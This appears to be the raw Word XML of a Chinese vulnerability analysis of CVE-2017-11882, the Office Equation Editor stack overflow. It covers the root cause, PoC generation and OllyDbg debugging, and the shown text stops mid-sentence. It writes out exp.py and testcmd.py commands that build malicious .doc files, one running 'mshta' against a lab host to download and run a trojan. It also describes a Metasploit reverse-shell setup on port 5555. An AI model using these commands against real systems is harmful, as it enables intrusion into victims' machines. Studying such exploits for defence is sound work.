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907D3" w14:textId="77777777" w:rsidR="00CF18F4" w:rsidRPr="003B378D" w:rsidRDefault="0039683A" w:rsidP="003B378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O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ffice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>通杀漏洞</w:t>
      </w:r>
      <w:r w:rsidR="003B378D" w:rsidRPr="003B378D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>CVE-2017-11882</w:t>
      </w:r>
      <w:r w:rsidR="003B378D" w:rsidRPr="003B378D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E12B4" w14:textId="77777777" w:rsidR="003B378D" w:rsidRPr="003B378D" w:rsidRDefault="003B378D" w:rsidP="003B378D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B378D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>何适之</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25405032" w14:textId="77777777" w:rsidR="001814D4" w:rsidRDefault="001814D4" w:rsidP="003B378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675"/>
      </w:tblGrid>
      <w:tr w:rsidR="001814D4" w:rsidRPr="001814D4" w14:paraId="3707A279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489C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漏洞ID </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C5B5639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CVE-2017-11882 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001814D4" w:rsidRPr="001814D4" w14:paraId="66687821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C6A9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漏洞名称 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42021EE8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Microsoft Office数学公式编辑器内存损坏漏洞 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001814D4" w:rsidRPr="001814D4" w14:paraId="474AE7C3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7FA0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漏洞类型 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="298DFDB6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远程代码执行 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001814D4" w:rsidRPr="001814D4" w14:paraId="02840690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09F8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威胁类型 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="594D38AC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栈溢出 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001814D4" w:rsidRPr="001814D4" w14:paraId="7FCE8ABF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8141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影响版本 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AF76444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Microsoft Office 2000/2003/2007sp3/2010sp2/2013sp1/2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31ADBFF1" w14:textId="77777777" w:rsidR="003B378D" w:rsidRDefault="003B378D" w:rsidP="003B378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78D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>测试环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A95272" w14:textId="77777777" w:rsidR="000A0E01" w:rsidRPr="000A0E01" w:rsidRDefault="003B378D" w:rsidP="00D16082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Windows 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>Office 2013</w:t>
      </w:r>
      <w:r w:rsidRPr="003B378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B378D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">API Monitor </w:t>
      </w:r>
      <w:r w:rsidRPr="003B378D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D16082">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OllyDBG</w:t>
      </w:r>
      <w:r w:rsidRPr="003B378D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">IDA </w:t>
      </w:r>
      <w:r w:rsidR="00465A91">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CCCDB6" w14:textId="77777777" w:rsidR="00BA77F8" w:rsidRDefault="00BA77F8" w:rsidP="00BA77F8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA77F8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FC80FA" w14:textId="77777777" w:rsidR="00562109" w:rsidRPr="00BA77F8" w:rsidRDefault="00562109" w:rsidP="00BA77F8">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FECEA10" w14:textId="77777777" w:rsidR="00BA77F8" w:rsidRPr="00D42506" w:rsidRDefault="00BA77F8" w:rsidP="00BA77F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞出现在模块EQNEDT32.EXE中，该模块以OLE技术（Object Linking and Embedding，对象链接与嵌入）将公式嵌入在Office文档内。当插入和编辑数学公式时，EQNEDT32.EXE并不会被作为Office进程 （如Word等）的子进程创建，而是以单独的进程形式存在。这就意味着对于word、excel等Office进程的保护机制，无法阻止 EQNEDT32.EXE这个进程被利用。漏洞存在于EQNEDT32.EXE处理Office OLE Equation对象中标记为字体名称记录的字节流中，如果Equation对象中存在标记为字体名称的超长字节流，则程序在处理该字符串的过程，会由于 判断字符串长度而发生栈溢出漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDC293A" w14:textId="77777777" w:rsidR="000A0E01" w:rsidRDefault="000A0E01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4F265F80" w14:textId="77777777" w:rsidR="00562109" w:rsidRDefault="00562109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0E2A8BA4" w14:textId="77777777" w:rsidR="00562109" w:rsidRPr="00BA77F8" w:rsidRDefault="00562109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113BD9C3" w14:textId="77777777" w:rsidR="00BA77F8" w:rsidRPr="00DE5AE2" w:rsidRDefault="00DE167C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lastRenderedPageBreak/>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00BE3328">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401DD6BF" w14:textId="77777777" w:rsidR="00E525E4" w:rsidRDefault="00EE617D" w:rsidP="00465A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PO</w:t>
      </w:r>
      <w:r w:rsidR="006C41EC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00AF75FA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r w:rsidR="00AF75FA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：采用</w:t>
      </w:r>
      <w:r w:rsidR="00AF75FA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网上的</w:t>
      </w:r>
      <w:r w:rsidR="00AF75FA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exp.py生成test.doc</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,执行</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>弹出计算器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C42D1C" w14:textId="77777777" w:rsidR="00AF75FA" w:rsidRPr="00E525E4" w:rsidRDefault="00AF75FA" w:rsidP="00465A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python exp.py –c “cmd.exe </w:t>
      </w:r>
      <w:r w:rsidR="003447DF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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t xml:space="preserve">c </w:t>
      </w:r>
      <w:r w:rsidR="0039683A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>calc.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="0039683A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –o test.doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28036F34" w14:textId="77777777" w:rsidR="00BD7C68" w:rsidRDefault="00CF18F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB2E0D8" wp14:editId="1F688175">
            <wp:extent cx="5274310" cy="42583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E42D" w14:textId="77777777" w:rsidR="006C41EC" w:rsidRDefault="006C41E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EXP测试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43B7545C" w14:textId="77777777" w:rsidR="006A673E" w:rsidRDefault="00590483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将EXP的相关文件部署到msf中，使用该exploit模块，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设置反弹端口为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5555，</w:t>
      </w:r>
      <w:r w:rsidR="00C07AEB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URI的路径是8080端口的test文件</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2C283C" w14:textId="77777777" w:rsidR="006A673E" w:rsidRDefault="00DD3D1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另外</w:t>
      </w:r>
      <w:r w:rsidR="00020E10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ython</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> testcmd.py –c “mshta </w:t>
      </w:r>
      <w:r w:rsidR="006A673E" w:rsidRPr="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.179.133:8080/test</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” –o rrr.doc</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>生成自动访问</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test的漏洞文档rrr.</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>doc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006A673E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18106555" w14:textId="77777777" w:rsidR="00590483" w:rsidRPr="00912852" w:rsidRDefault="00590483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受害者点击rrr.doc，就获得了反弹shell。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480C3822" w14:textId="77777777" w:rsidR="00590483" w:rsidRDefault="00590483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3B27D2" wp14:editId="03734D41">
            <wp:extent cx="5274310" cy="34245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4A6B" w14:textId="25779630" w:rsidR="008E26B7" w:rsidRDefault="008462D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其实是调用WinExec执行m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，从而下载并执行服务器上的木马，由于WinExec本身存在于E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>QNEDT32.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的代码段，所以不需要绕过ASLR泄露地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797DAB15" w14:textId="77777777" w:rsidR="00D42506" w:rsidRPr="00D42506" w:rsidRDefault="00D42506">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65193804" w14:textId="77777777" w:rsidR="00E525E4" w:rsidRDefault="00D10E9F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调试</w:t>
      </w:r>
      <w:r w:rsidR="00D42506" w:rsidRPr="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidR="00D42506" w:rsidRPr="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4" w:rsidRPr="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidR="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EQNEDT</w:t>
      </w:r>
      <w:r w:rsidR="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32.exe并用OD附加</w:t>
      </w:r>
      <w:r w:rsidR="00490448">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
      <w:r w:rsidR="00A62409">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bp </w:t>
      </w:r>
      <w:r w:rsidR="00E525E4" w:rsidRPr="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidR="005E6F68">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行下断，打开</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4" w:rsidRPr="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件test.doc</w:t>
      </w:r>
      <w:r w:rsidR="005E6F68">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，此时</w:t>
      </w:r>
      <w:r w:rsidR="009A18F0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
      <w:r w:rsidR="005E6F68">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>断</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4" w:rsidRPr="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在WinExec函数上</w:t>
      </w:r>
      <w:r w:rsidR="00E525E4" w:rsidRPr="00D42506">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386E72B" w14:textId="77777777" w:rsidR="00D10E9F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79675F4C" wp14:editId="0DBFD8A7">
            <wp:extent cx="5676900" cy="3714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1DCF" w14:textId="77777777" w:rsidR="001E4E32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图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11076917" w14:textId="77777777" w:rsidR="001E4E32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此时返回地址是0x430c18，如图2，也就是WinExec执行完毕后的下一条指令，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>此时计算器已经弹出来了，所以我们需要逆向跟踪到漏洞发生的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6457577E" w14:textId="77777777" w:rsidR="00DF75FD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13E743D4" wp14:editId="2A21E898">
            <wp:extent cx="5274310" cy="32162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6933" w14:textId="77777777" w:rsidR="001E4E32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图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0476A2" w14:textId="77777777" w:rsidR="001E4E32" w:rsidRDefault="001E4E32">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55480C07" w14:textId="77777777" w:rsidR="001E4E32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71E4DB1E" wp14:editId="73B70E2C">
            <wp:extent cx="5226319" cy="118751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6F4" w14:textId="77777777" w:rsidR="001E4E32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图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A68D363" w14:textId="77777777" w:rsidR="001E4E32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根据栈内保存的信息，发现执行流程是从4115A7处跳转过来，见图3。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42824126" w14:textId="77777777" w:rsidR="001E4E32" w:rsidRDefault="001E4E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50A7ACFD" wp14:editId="4BA43B41">
            <wp:extent cx="5274310" cy="8235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33E3" w14:textId="77777777" w:rsidR="00E563C4" w:rsidRDefault="00E563C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图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14754038" w14:textId="77777777" w:rsidR="001E4E32" w:rsidRDefault="00E563C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如图</w:t>
